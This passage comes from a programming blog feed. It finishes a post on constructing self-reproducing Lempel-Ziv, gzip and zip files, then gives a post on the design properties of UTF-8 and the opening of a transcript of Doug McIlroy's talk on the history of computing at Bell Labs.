And you know what programming language has essentially only a repetition operator?
The language used to encode Lempel-Ziv compressed files
like the ones used by <code>gzip</code> and <code>zip</code>.
</p>
<h3>Self-reproducing Lempel-Ziv programs</h3>
<p class=pp>
Lempel-Ziv compressed data is a stream of instructions with two basic
opcodes: <code>literal(</code><i>n</i><code>)</code> followed by
<i>n</i> bytes of data means write those <i>n</i> bytes into the
decompressed output,
and <code>repeat(</code><i>d</i><code>,</code> <i>n</i><code>)</code>
means look backward <i>d</i> bytes from the current location
in the decompressed output and copy the <i>n</i> bytes you find there
into the output stream.
</p>
<p class=pp>
The programming exercise, then, is this: write a Lempel-Ziv program
using just those two opcodes that prints itself when run.
In other words, write a compressed data stream that decompresses to itself.
Feel free to assume any reasonable encoding for the <code>literal</code>
and <code>repeat</code> opcodes.
For the grand prize, find a program that decompresses to
itself surrounded by an arbitrary prefix and suffix,
so that the sequence could be embedded in an actual <code>gzip</code>
or <code>zip</code> file, which has a fixed-format header and trailer.
</p>
<p class=pp>
<b>Spoiler alert!</b>
I urge you to try this on your own before continuing to read.
It's a great way to spend a lazy afternoon, and you have
one critical advantage that I didn't: you know there is a solution.
</p>
<center>
<br><br>
<i>(Spoiler blocker.)</i>
<br>
<a href=""><img src="https://research.swtch.com/the_best_circular_bike(sbcc_sbma_students_roof).jpg"></a>
<br>
<i><a href="http://www.robertwechsler.com/thebest.html">http://www.robertwechsler.com/thebest.html</a></i>
<br><br>
</center>
<p class=lp>By the way, here's <a href="http://swtch.com/r.gz"><code>r.gz</code></a>, gzip files all the way down.
<pre class=indent>
$ gunzip < r.gz > r
$ cmp r r.gz
$
</pre>
<p class=lp>The nice thing about <code>r.gz</code> is that even broken web browsers
that ordinarily decompress downloaded gzip data before storing it to disk
will handle this file correctly!
</p>
<p class=pp>Enough stalling to hide the spoilers.
Let's use this shorthand to describe Lempel-Ziv instructions:
<code>L</code><i>n</i> and <code>R</code><i>n</i> are
shorthand for <code>literal(</code><i>n</i><code>)</code> and
<code>repeat(</code><i>n</i><code>,</code> <i>n</i><code>)</code>,
and the program assumes that each code is one byte.
<code>L0</code> is therefore the Lempel-Ziv no-op;
<code>L5</code> <code>hello</code> prints <code>hello</code>;
and so does <code>L3</code> <code>hel</code> <code>R1</code> <code>L1</code> <code>o</code>.
</p>
<p class=pp>
Here's a Lempel-Ziv program that prints itself.
(Each line is one instruction.)
</p>
<br>
<center>
<table border=0>
<tr><th></th><th width=30></th><th>Code</th><th width=30></th><th>Output</th></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">no-op</span></i></td><td></td><td><code>L0</code></td><td></td><td></td></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">no-op</span></i></td><td></td><td><code>L0</code></td><td></td><td></td></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">no-op</span></i></td><td></td><td><code>L0</code></td><td></td><td></td></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td><td></td><td><code>L4 <span style="color: #005500">L0 L0 L0 L4</span></code></td><td></td><td><code>L0 L0 L0 L4</code></td></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td><td></td><td><code>R4</code></td><td></td><td><code>L0 L0 L0 L4</code></td></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td><td></td><td><code>L4 <span style="color: #005500">R4 L4 R4 L4</span></code></td><td></td><td><code>R4 L4 R4 L4</code></td></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td><td></td><td><code>R4</code></td><td></td><td><code>R4 L4 R4 L4</code></td></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td><td></td><td><code>L4 <span style="color: #005500">L0 L0 L0 L0</span></code></td><td></td><td><code>L0 L0 L0 L0</code></td></tr>
</table>
</center>
<br>
<p class=lp>
(The two columns Code and Output contain the same byte sequence.)
</p>
<p class=pp>
The interesting core of this program is the 6-byte sequence
<code>L4 R4 L4 R4 L4 R4</code>, which prints the 8-byte sequence <code>R4 L4 R4 L4 R4 L4 R4 L4</code>.
That is, it prints itself with an extra byte before and after.
</p>
<p class=pp>
When we were trying to write the self-reproducing Python program,
the basic problem was that the print statement was always longer
than what it printed. We solved that problem with recursion,
computing the string to print by plugging it into itself.
Here we took a different approach.
The Lempel-Ziv program is
particularly repetitive, so that a repeated substring ends up
containing the entire fragment. The recursion is in the
representation of the program rather than its execution.
Either way, that fragment is the crucial point.
Before the final <code>R4</code>, the output lags behind the input.
Once it executes, the output is one code ahead.
</p>
<p class=pp>
The <code>L0</code> no-ops are plugged into
a more general variant of the program, which can reproduce itself
with the addition of an arbitrary three-byte prefix and suffix:
</p>
<br>
<center>
<table border=0>
<tr><th></th><th width=30></th><th>Code</th><th width=30></th><th>Output</th></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td><td></td><td><code>L4 <span style="color: #005500"><i>aa bb cc</i> L4</span></code></td><td></td><td><code><i>aa bb cc</i> L4</code></td></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td><td></td><td><code>R4</code></td><td></td><td><code><i>aa bb cc</i> L4</code></td></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td><td></td><td><code>L4 <span style="color: #005500">R4 L4 R4 L4</span></code></td><td></td><td><code>R4 L4 R4 L4</code></td></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td><td></td><td><code>R4</code></td><td></td><td><code>R4 L4 R4 L4</code></td></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td><td></td><td><code>L4 <span style="color: #005500">R4 <i>xx yy zz</i></span></code></td><td></td><td><code>R4 <i>xx yy zz</i></code></td></tr>
<tr><td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td><td></td><td><code>R4</code></td><td></td><td><code>R4 <i>xx yy zz</i></code></td></tr>
</table>
</center>
<br>
<p class=lp>
(The byte sequence in the Output column is <code><i>aa bb cc</i></code>, then
the byte sequence from the Code column, then <code><i>xx yy zz</i></code>.)
</p>
<p class=pp>
It took me the better part of a quiet Sunday to get this far,
but by the time I got here I knew the game was over
and that I'd won.
From all that experimenting, I knew it was easy to create
a program fragment that printed itself minus a few instructions
or even one that printed an arbitrary prefix
and then itself, minus a few instructions.
The extra <code>aa bb cc</code> in the output
provides a place to attach such a program fragment.
Similarly, it's easy to create a fragment to attach
to the <code>xx yy zz</code> that prints itself,
minus the first three instructions, plus an arbitrary suffix.
We can use that generality to attach an appropriate
header and trailer.
</p>
<p class=pp>
Here is the final program, which prints itself surrounded by an
arbitrary prefix and suffix.
<code>[P]</code> denotes the <i>p</i>-byte compressed form of the prefix <code>P</code>;
similarly, <code>[S]</code> denotes the <i>s</i>-byte compressed form of the suffix <code>S</code>.
</p>
<br>
<center>
<table border=0>
<tr><th></th><th width=30></th><th>Code</th><th width=30></th><th>Output</th></tr>
<tr>
<td align=right><i><span style="font-size: 0.8em;">print prefix</span></i></td>
<td></td>
<td><code>[P]</code></td>
<td></td>
<td><code>P</code></td>
</tr>
<tr>
<td align=right><span style="font-size: 0.8em;"><i>print </i>p<i>+1 bytes</i></span></td>
<td></td>
<td><code>L</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code> <span style="color: #005500">[P] L</span></code><span style="color: #005500"><span style="font-size: 0.8em;"><i>p</i>+1</span></span><code></code></td>
<td></td>
<td><code>[P] L</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code></code></td>
</tr>
<tr>
<td align=right><span style="font-size: 0.8em;"><i>repeat last </i>p<i>+1 printed bytes</i></span></td>
<td></td>
<td><code>R</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code></code></td>
<td></td>
<td><code>[P] L</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code></code></td>
</tr>
<tr>
<td align=right><span style="font-size: 0.8em;"><i>print 1 byte</i></span></td>
<td></td>
<td><code>L1 <span style="color: #005500">R</span></code><span style="color: #005500"><span style="font-size: 0.8em;"><i>p</i>+1</span></span><code></code></td>
<td></td>
<td><code>R</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code></code></td>
</tr>
<tr>
<td align=right><span style="font-size: 0.8em;"><i>print 1 byte</i></span></td>
<td></td>
<td><code>L1 <span style="color: #005500">L1</span></code></td>
<td></td>
<td><code>L1</code></td>
</tr>
<tr>
<td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td>
<td></td>
<td><code>L4 <span style="color: #005500">R</span></code><span style="color: #005500"><span style="font-size: 0.8em;"><i>p</i>+1</span></span><code><span style="color: #005500"> L1 L1 L4</span></code></td>
<td></td>
<td><code>R</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code> L1 L1 L4</code></td>
</tr>
<tr>
<td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td>
<td></td>
<td><code>R4</code></td>
<td></td>
<td><code>R</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code> L1 L1 L4</code></td>
</tr>
<tr>
<td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td>
<td></td>
<td><code>L4 <span style="color: #005500">R4 L4 R4 L4</span></code></td>
<td></td>
<td><code>R4 L4 R4 L4</code></td>
</tr>
<tr>
<td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td>
<td></td>
<td><code>R4</code></td>
<td></td>
<td><code>R4 L4 R4 L4</code></td>
</tr>
<tr>
<td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td>
<td></td>
<td><code>L4 <span style="color: #005500">R4 L0 L0 L</span></code><span style="color: #005500"><span style="font-size: 0.8em;"><i>s</i>+1</span></span><code><span style="color: #005500"></span></code></td>
<td></td>
<td><code>R4 L0 L0 L</code><span style="font-size: 0.8em;"><i>s</i>+1</span><code></code></td>
</tr>
<tr>
<td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td>
<td></td>
<td><code>R4</code></td>
<td></td>
<td><code>R4 L0 L0 L</code><span style="font-size: 0.8em;"><i>s</i>+1</span><code></code></td>
</tr>
<tr>
<td align=right><i><span style="font-size: 0.8em;">no-op</span></i></td>
<td></td>
<td><code>L0</code></td>
<td></td>
<td></td>
</tr>
<tr>
<td align=right><i><span style="font-size: 0.8em;">no-op</span></i></td>
<td></td>
<td><code>L0</code></td>
<td></td>
<td></td>
</tr>
<tr>
<td align=right><span style="font-size: 0.8em;"><i>print </i>s<i>+1 bytes</i></span></td>
<td></td>
<td><code>L</code><span style="font-size: 0.8em;"><i>s</i>+1</span><code> <span style="color: #005500">R</span></code><span style="color: #005500"><span style="font-size: 0.8em;"><i>s</i>+1</span></span><code><span style="color: #005500"> [S]</span></code></td>
<td></td>
<td><code>R</code><span style="font-size: 0.8em;"><i>s</i>+1</span><code> [S]</code></td>
</tr>
<tr>
<td align=right><span style="font-size: 0.8em;"><i>repeat last </i>s<i>+1 bytes</i></span></td>
<td></td>
<td><code>R</code><span style="font-size: 0.8em;"><i>s</i>+1</span><code></code></td>
<td></td>
<td><code>R</code><span style="font-size: 0.8em;"><i>s</i>+1</span><code> [S]</code></td>
</tr>
<tr>
<td align=right><i><span style="font-size: 0.8em;">print suffix</span></i></td>
<td></td>
<td><code>[S]</code></td>
<td></td>
<td><code>S</code></td>
</tr>
</table>
</center>
<br>
<p class=lp>
(The byte sequence in the Output column is <code><i>P</i></code>, then
the byte sequence from the Code column, then <code><i>S</i></code>.)
</p>
<h3>Self-reproducing zip files</h3>
<p class=pp>
Now the rubber meets the road.
We've solved the main theoretical obstacle to making a self-reproducing
zip file, but there are a couple practical obstacles
still in our way.
</p>
<p class=pp>
The first obstacle is to translate our self-reproducing Lempel-Ziv program,
written in simplified opcodes, into the real opcode encoding.
<a href="http://www.ietf.org/rfc/rfc1951.txt">RFC 1951</a> describes the DEFLATE format used in both gzip and zip: a sequence of blocks, each of which
is a sequence of opcodes encoded using Huffman codes.
Huffman codes assign different length bit strings
to different opcodes,
breaking our assumption above that opcodes have
fixed length.
But wait!
We can, with some care, find a set of fixed-size encodings
that says what we need to be able to express.
</p>
<p class=pp>
In DEFLATE, there are literal blocks and opcode blocks.
The header at the beginning of a literal block is 5 bytes:
</p>
<center>
<img src="https://research.swtch.com/zip1.png">
</center>
<p class=pp>
If the translation of our <code>L</code> opcodes above
are 5 bytes each, the translation of the <code>R</code> opcodes
must also be 5 bytes each, with all the byte counts
above scaled by a factor of 5.
(For example, <code>L4</code> now has a 20-byte argument,
and <code>R4</code> repeats the last 20 bytes of output.)
The opcode block
with a single <code>repeat(20,20)</code> instruction falls well short of
5 bytes:
</p>
<center>
<img src="https://research.swtch.com/zip2.png">
</center>
<p class=lp>Luckily, an opcode block containing two
<code>repeat(20,10)</code> instructions has the same effect and is exactly 5 bytes:
</p>
<center>
<img src="https://research.swtch.com/zip3.png">
</center>
<p class=lp>
Encoding the other sized repeats
(<code>R</code><span style="font-size: 0.8em;"><i>p</i>+1</span> and
<code>R</code><span style="font-size: 0.8em;"><i>s</i>+1</span>)
takes more effort
and some sleazy tricks, but it turns out that
we can design 5-byte codes that repeat any amount
from 9 to 64 bytes.
For example, here are the repeat blocks for 10 bytes and for 40 bytes:
</p>
<center>
<img src="https://research.swtch.com/zip4.png">
<br>
<img src="https://research.swtch.com/zip5.png">
</center>
<p class=lp>
The repeat block for 10 bytes is two bits too short,
but every repeat block is followed by a literal block,
which starts with three zero bits and then padding
to the next byte boundary.
If a repeat block ends two bits short of a byte
but is followed by a literal block, the literal block's
padding will insert the extra two bits.
Similarly, the repeat block for 40 bytes is five bits too long,
but they're all zero bits.
Starting a literal block five bits too late
steals the bits from the padding.
Both of these tricks only work because the last 7 bits of
any repeat block are zero and the bits in the first byte
of any literal block are also zero,
so the boundary isn't directly visible.
If the literal block started with a one bit,
this sleazy trick wouldn't work.
</p>
<p class=pp>The second obstacle is that zip archives (and gzip files)
record a CRC32 checksum of the uncompressed data.
Since the uncompressed data is the zip archive,
the data being checksummed includes the checksum itself.
So we need to find a value <i>x</i> such that writing <i>x</i> into
the checksum field causes the file to checksum to <i>x</i>.
Recursion strikes back.
</p>
<p class=pp>
The CRC32 checksum computation interprets the entire file as a big number and computes
the remainder when you divide that number by a specific constant
using a specific kind of division.
We could go through the effort of setting up the appropriate
equations and solving for <i>x</i>.
But frankly, we've already solved one nasty recursive puzzle
today, and <a href="http://www.youtube.com/watch?v=TQBLTB5f3j0">enough is enough</a>.
There are only four billion possibilities for <i>x</i>:
we can write a program to try each in turn, until it finds one that works.
</p>
<p class=pp>
If you want to recreate these files yourself, there are a
few more minor obstacles, like making sure the tar file is a multiple
of 512 bytes and compressing the rather large zip trailer to
at most 59 bytes so that <code>R</code><span style="font-size: 0.8em;"><i>s</i>+1</span> is
at most <code>R</code><span style="font-size: 0.8em;">64</span>.
But they're just a simple matter of programming.
</p>
<p class=pp>
So there you have it:
<code><a href="http://swtch.com/r.gz">r.gz</a></code> (gzip files all the way down),
<code><a href="http://swtch.com/r.tar.gz">r.tar.gz</a></code> (gzipped tar files all the way down),
and
<code><a href="http://swtch.com/r.zip">r.zip</a></code> (zip files all the way down).
I regret that I have been unable to find any programs
that insist on decompressing these files recursively, ad infinitum.
It would have been fun to watch them squirm, but
it looks like much less sophisticated
<a href="http://en.wikipedia.org/wiki/Zip_bomb">zip bombs</a> have spoiled the fun.
</p>
<p class=pp>
If you're feeling particularly ambitious, here is
<a href="http://swtch.com/rgzip.go">rgzip.go</a>,
the <a href="http://golang.org/">Go</a> program that generated these files.
I wonder if you can create a zip file that contains a gzipped tar file
that contains the original zip file.
Ken Thompson suggested trying to make a zip file that
contains a slightly larger copy of itself, recursively,
so that as you dive down the chain of zip files
each one gets a little bigger.
(If you do manage either of these, please leave a comment.)
</p>
<br>
<p class=lp><font size=-1>P.S. I can't end the post without sharing my favorite self-reproducing program: the one-line shell script <code>#!/bin/cat</code></font>.
</p></p>
</div>
</div>
</div>
UTF-8: Bits, Bytes, and Benefitstag:research.swtch.com,2012:research.swtch.com/utf82010-03-05T00:00:00-05:002010-03-05T00:00:00-05:00The reasons to switch to UTF-8
<p><p class=pp>
UTF-8 is a way to encode Unicode code points—integer values from
0 through 10FFFF—into a byte stream,
and it is far simpler than many people realize.
The easiest way to make it confusing or complicated
is to treat it as a black box, never looking inside.
So let's start by looking inside. Here it is:
</p>
<center>
<table cellspacing=5 cellpadding=0 border=0>
<tr height=10><th colspan=4></th></tr>
<tr><th align=center colspan=2>Unicode code points</th><th width=10><th align=center>UTF-8 encoding (binary)</th></tr>
<tr height=10><td colspan=4></td></tr>
<tr><td align=right>00-7F</td><td>(7 bits)</td><td></td><td align=right>0<i>tuvwxyz</i></td></tr>
<tr><td align=right>0080-07FF</td><td>(11 bits)</td><td></td><td align=right>110<i>pqrst</i> 10<i>uvwxyz</i></td></tr>
<tr><td align=right>0800-FFFF</td><td>(16 bits)</td><td></td><td align=right>1110<i>jklm</i> 10<i>npqrst</i> 10<i>uvwxyz</i></td></tr>
<tr><td align=right valign=top>010000-10FFFF</td><td>(21 bits)</td><td></td><td align=right valign=top>11110<i>efg</i> 10<i>hijklm</i> 10<i>npqrst</i> 10<i>uvwxyz</i></td>
<tr height=10><td colspan=4></td></tr>
</table>
</center>
<p class=lp>
The convenient properties of UTF-8 are all consequences of the choice of encoding.
</p>
<ol>
<li><i>All ASCII files are already UTF-8 files.</i><br>
The first 128 Unicode code points are the 7-bit ASCII character set,
and UTF-8 preserves their one-byte encoding.
</li>
<li><i>ASCII bytes always represent themselves in UTF-8 files. They never appear as part of other UTF-8 sequences.</i><br>
All the non-ASCII UTF-8 sequences consist of bytes
with the high bit set, so if you see the byte 0x7A in a UTF-8 file,
you can be sure it represents the character <code>z</code>.
</li>
<li><i>ASCII bytes are always represented as themselves in UTF-8 files. They cannot be hidden inside multibyte UTF-8 sequences.</i><br>
The ASCII <code>z</code> 01111010 cannot be encoded as a two-byte UTF-8 sequence
11000001 10111010</code>. Code points must be encoded using the shortest
possible sequence.
A corollary is that decoders must detect long-winded sequences as invalid.
In practice, it is useful for a decoder to use the Unicode replacement
character, code point FFFD, as the decoding of an invalid UTF-8 sequence
rather than stop processing the text.
</li>
<li><i>UTF-8 is self-synchronizing.</i><br>
Let's call a byte of the form 10<i>xxxxxx</i>
a continuation byte.
Every UTF-8 sequence is a byte that is not a continuation byte
followed by zero or more continuation bytes.
If you start processing a UTF-8 file at an arbitrary point,
you might not be at the beginning of a UTF-8 encoding,
but you can easily find one: skip over
continuation bytes until you find a non-continuation byte.
(The same applies to scanning backward.)
</li>
<li><i>Substring search is just byte string search.</i><br>
Properties 2, 3, and 4 imply that given a string
of correctly encoded UTF-8, the only way those bytes
can appear in a larger UTF-8 text is when they represent the
same code points. So you can use any 8-bit safe byte at a time
search function, like <code>strchr</code> or <code>strstr</code>, to run the search.
</li>
<li><i>Most programs that handle 8-bit files safely can handle UTF-8 safely.</i><br>
This also follows from Properties 2, 3, and 4.
I say “most” programs, because programs that
take apart a byte sequence expecting one character per byte
will not behave correctly, but very few programs do that.
It is far more common to split input at newline characters,
or split whitespace-separated fields, or do other similar parsing
around specific ASCII characters.
For example, Unix tools like cat, cmp, cp, diff, echo, head, tail, and tee
can process UTF-8 files as if they were plain ASCII files.
Most operating system kernels should also be able to handle
UTF-8 file names without any special arrangement, since the
only operations done on file names are comparisons
and splitting at <code>/</code>.
In contrast, tools like grep, sed, and wc, which inspect arbitrary
individual characters, do need modification.
</li>
<li><i>UTF-8 sequences sort in code point order.</i><br>
You can verify this by inspecting the encodings in the table above.
This means that Unix tools like join, ls, and sort (without options) don't need to handle
UTF-8 specially.
</li>
<li><i>UTF-8 has no “byte order.”</i><br>
UTF-8 is a byte encoding. It is not little endian or big endian.
Unicode defines a byte order mark (BOM) code point FFFE,
which are used to determine the byte order of a stream of
raw 16-bit values, like UCS-2 or UTF-16.
It has no place in a UTF-8 file.
Some programs like to write a UTF-8-encoded BOM
at the beginning of UTF-8 files, but this is unnecessary
(and annoying to programs that don't expect it).
</li>
</ol>
<p class=lp>
UTF-8 does give up the ability to do random
access using code point indices.
Programs that need to jump to the <i>n</i>th
Unicode code point in a file or on a line—text editors are the canonical example—will
typically convert incoming UTF-8 to an internal representation
like an array of code points and then convert back to UTF-8
for output,
but most programs are simpler when written to manipulate UTF-8 directly.
</p>
<p class=pp>
Programs that make UTF-8 more complicated than it needs to be
are typically trying to be too general,
not wanting to make assumptions that might not be true of
other encodings.
But there are good tools to convert other encodings to UTF-8,
and it is slowly becoming the standard encoding:
even the fraction of web pages
written in UTF-8 is
<a href="http://googleblog.blogspot.com/2010/01/unicode-nearing-50-of-web.html">nearing 50%</a>.
UTF-8 was explicitly designed
to have these nice properties. Take advantage of them.
</p>
<p class=pp>
For more on UTF-8, see “<a href="https://9p.io/sys/doc/utf.html">Hello World
or
Καλημέρα κόσμε
or
こんにちは 世界</a>,” by Rob Pike
and Ken Thompson, and also this <a href="http://www.cl.cam.ac.uk/~mgk25/ucs/utf-8-history.txt">history</a>.
</p>
<br>
<font size=-1>
<p class=lp>
Notes: Property 6 assumes the tools do not strip the high bit from each byte.
Such mangling was common years ago but is very uncommon now.
Property 7 assumes the comparison is done treating
the bytes as unsigned, but such behavior is mandated
by the ANSI C standard for <code>memcmp</code>,
<code>strcmp</code>, and <code>strncmp</code>.
</p>
</font></p>
Computing History at Bell Labstag:research.swtch.com,2012:research.swtch.com/bell-labs2008-04-09T00:00:00-04:002008-04-09T00:00:00-04:00Doug McIlroy’s rememberances
<p><p class=pp>
In 1997, on his retirement from Bell Labs, <a href="http://www.cs.dartmouth.edu/~doug/">Doug McIlroy</a> gave a
fascinating talk about the “<a href="https://web.archive.org/web/20081022192943/http://cm.bell-labs.com/cm/cs/doug97.html"><b>History of Computing at Bell Labs</b></a>.”
Almost ten years ago I transcribed the audio but never did anything with it.
The transcript is below.
</p>
<p class=pp>
My favorite parts of the talk are the description of the bi-quinary decimal relay calculator
and the description of a team that spent over a year tracking down a race condition bug in
a missile detector (reliability was king: today you’d just stamp
“cannot reproduce” and send the report back).
But the whole thing contains many fantastic stories.
It’s well worth the read or listen.
I also like his recollection of programming using cards: “It’s the kind of thing you can be nostalgic about, but it wasn’t actually fun.”
</p>
<p class=pp>
For more information, Bernard D. Holbrook and W. Stanley Brown’s 1982
technical report
“<a href="cstr99.pdf">A History of Computing Research at Bell Laboratories (1937-1975)</a>”
covers the earlier history in more detail.
</p>
<p><i>Corrections added August 19, 2009. Links updated May 16, 2018.</i></p>
<p><i>Update, December 19, 2020.</i> The original audio files disappeared along with the rest of the Bell Labs site some time ago, but I discovered a saved copy on one of my computers: [<a href="mcilroy97history.mp3">MP3</a> | <a href="mcilroy97history.rm">original RealAudio</a>].
I also added a few corrections and notes from Doug McIlroy, dated 2015 [sic].</p>
<br>
<br>
<p class=lp><b>Transcript</b></p>
<p class=pp>
Computing at Bell Labs is certainly an outgrowth of the
<a href="https://web.archive.org/web/20080622172015/http://cm.bell-labs.com/cm/ms/history/history.html">mathematics department</a>, which grew from that first hiring
in 1897, G A Campbell. When Bell Labs was formally founded
in 1925, what it had been was the engineering department
of Western Electric.
When it was formally founded in 1925,
almost from the beginning there was a math department with Thornton Fry as the department head, and if you look at some of Fry’s work, it turns out that
he was fussing around in 1929 with trying to discover
information theory. It didn’t actually gel until twenty years later with Shannon.</p>
<p class=pp><span style="font-size: 0.7em;">1:10</span>
Of course, most of the mathematics at that time was continuous.
One was interested in analyzing circuits and propagation. And indeed, this is what led to the growth of computing in Bell Laboratories. The computations could not all be done symbolically. There were not closed form solutions. There was lots of numerical computation done.
The math department had a fair stable of computers,
which in those days meant people. [laughter]</p>
<p class=pp><span style="font-size: 0.7em;">2:00</span>
And in the late ’30s, <a href="http://en.wikipedia.org/wiki/George_Stibitz">George Stibitz</a> had an idea that some of
the work that they were doing on hand calculators might be
automated by using some of the equipment that the Bell System
was installing in central offices, namely relay circuits.
He went home, and on his kitchen table, he built out of relays
a binary arithmetic circuit. He decided that binary was really
the right way to compute.
However, when he finally came to build some equipment,
he determined that binary to decimal conversion and
decimal to binary conversion was a drag, and he didn’t
want to put it in the equipment, and so he finally built
in 1939, a relay calculator that worked in decimal,
and it worked in complex arithmetic.
Do you have a hand calculator now that does complex arithmetic?
Ten-digit, I believe, complex computations: add, subtract,
multiply, and divide.
The I/O equipment was teletypes, so essentially all the stuff to make such
machines out of was there.
Since the I/O was teletypes, it could be remotely accessed,
and there were in fact four stations in the West Street Laboratories
of Bell Labs. West Street is down on the left side of Manhattan.
I had the good fortune to work there one summer, right next to a
district where you’re likely to get bowled over by rolling beeves hanging from racks or tumbling cabbages. The building is still there. It’s called <a href="http://query.nytimes.com/gst/fullpage.html?res=950DE3DB1F38F931A35751C0A96F948260">Westbeth Apartments</a>. It’s now an artist’s colony.</p>
<p class=pp><span style="font-size: 0.7em;">4:29</span>
Anyway, in West Street, there were four separate remote stations from which the complex calculator could be accessed. It was not time sharing. You actually reserved your time on the machine, and only one of the four terminals worked at a time.
In 1940, this machine was shown off to the world at the AMS annual convention, which happened to be held in Hanover at Dartmouth that year, and mathematicians could wonder at remote computing, doing computation on an electromechanical calculator at 300 miles away.</p>
<p class=pp><span style="font-size: 0.7em;">5:22</span>
Stibitz went on from there to make a whole series of relay machines. Many of them were made for the government during the war. They were named, imaginatively, Mark I through Mark VI.
I have read some of his patents. They’re kind of fun. One is a patent on conditional transfer. [laughter] And how do you do a conditional transfer?
Well these gadgets were, the relay calculator was run from your fingers, I mean the complex calculator.
The later calculators, of course, if your fingers were a teletype, you could perfectly well feed a paper tape in,
because that was standard practice. And these later machines were intended really to be run more from paper tape.
And the conditional transfer was this: you had two teletypes, and there’s a code that says "time to read from the other teletype". Loops were of course easy to do. You take paper and [laughter; presumably Doug curled a piece of paper to form a physical loop].
These machines never got to the point of having stored programs.
But they got quite big. I saw, one of them was here in 1954, and I did see it, behind glass, and if you’ve ever seen these machines in the, there’s one in the Franklin Institute in Philadelphia, and there’s one in the Science Museum in San Jose, you know these machines that drop balls that go wandering sliding around and turning battle wheels and ringing bells and who knows what. It kind of looked like that.
It was a very quiet room, with just a little clicking of relays, which is what a central office used to be like. It was the one air-conditioned room in Murray Hill, I think. This machine ran, the Mark VI, well I think that was the Mark V, the Mark VI actually went to Aberdeen.
This machine ran for a good number of years, probably six, eight.
And it is said that it never made an undetected error. [laughter]</p>
<p class=pp><span style="font-size: 0.7em;">8:30</span>
What that means is that it never made an error that it did not diagnose itself and stop.
Relay technology was very very defensive. The telephone switching system had to work. It was full of self-checking,
and so were the calculators, so were the calculators that Stibitz made.</p>
<p class=pp><span style="font-size: 0.7em;">9:04</span>
Arithmetic was done in bi-quinary, a two out of five representation for decimal integers, and if there weren’t exactly two out of five relays activated it would stop.
This machine ran unattended over the weekends. People would
bring their tapes in, and the operator would paste everybody’s tapes together.
There was a beginning of job code on the tape and there was also a time indicator.
If the machine ran out of time, it automatically stopped and went to the next job. If the machine caught itself in an error, it backed up to the current job and tried it again.
They would load this machine on Friday night, and on Monday morning, all the tapes, all the entries would be available on output tapes.</p>
<p class=pp>Question: I take it they were using a different representation for loops
and conditionals by then.</p>
<p class=pp>Doug: Loops were done actually by they would run back and forth across the tape now, on this machine.</p>
<p class=pp><span style="font-size: 0.7em;">10:40</span>
Then came the transistor in ’48.
At Whippany, they actually had a transistorized computer, which was a respectable minicomputer, a box about this big, running in 1954, it ran from 1954 to 1956 solidly as a test run.
The notion was that this computer might fly in an airplane.
And during that two-year test run, one diode failed.
In 1957, this machine called <a href="http://www.cedmagic.com/history/tradic-transistorized.html">TRADIC</a>, did in fact fly in an airplane, but to the best of my knowledge, that machine was a demonstration machine. It didn’t turn into a production machine.
About that time, we started buying commercial machines.
It’s wonderful to think about the set of different architectures that existed in that time. The first machine we got was called a <a href="http://www.columbia.edu/acis/history/cpc.html">CPC from IBM</a>. And all it was was a big accounting machine with a very special plugboard on the side that provided an interpreter for doing ten-digit decimal arithmetic, including
opcodes for the trig functions and square root.</p>
<p class=pp><span style="font-size: 0.7em;">12:30</span>
It was also not a computer as we know it today,
because it wasn’t stored program, it had twenty-four memory locations as I recall, and it took its program instead of from tapes, from cards. This was not a total advantage. A tape didn’t get into trouble if you dropped it on the floor. [laughter].
CPC, the operator would stand in front of it, and there, you
would go through loops by taking cards out, it took human intervention, to take the cards out of the output of the card reader and put them in the ?top?. I actually ran some programs on the CPC ?...?. It’s the kind of thing you can be nostalgic about, but it wasn’t actually fun.
[laughter]</p>
<p class=pp><span style="font-size: 0.7em;">13:30</span>
The next machine was an <a href="http://www.columbia.edu/acis/history/650.html">IBM 650</a>, and here, this was a stored program, with the memory being on drum. There was no operating system for it. It came with a manual: this is what the machine does. And Michael Wolontis made an interpreter called the <a href="http://hopl.info/showlanguage2.prx?exp=6497">L1 interpreter</a> for this machine, so you could actually program in, the manual told you how to program in binary, and L1 allowed you to give something like 10 for add and 9 for subtract, and program in decimal instead. And of course that machine required interesting optimization, because it was a nice thing if the next program step were stored somewhere -- each program step had the address of the following step in it, and you would try to locate them around the drum so to minimize latency. So there were all kinds of optimizers around, but I don’t think Bell Labs made ?...? based on this called "soap" from Carnegie Mellon. That machine didn’t last very long. Fortunately, a machine with core memory came out from IBM in about ’56, the 704. Bell Labs was a little slow in getting one, in ’58. Again, the machine came without an operating system.
In fact, but it did have Fortran, which really changed the world.
It suddenly made it easy to write programs. But the way Fortran came from IBM, it came with a thing called the Fortran Stop Book.
This was a list of what happened, a diagnostic would execute the halt instruction, the operator would go read the panel lights and discover where the machine had stopped, you would then go look up in the stop book what that meant.
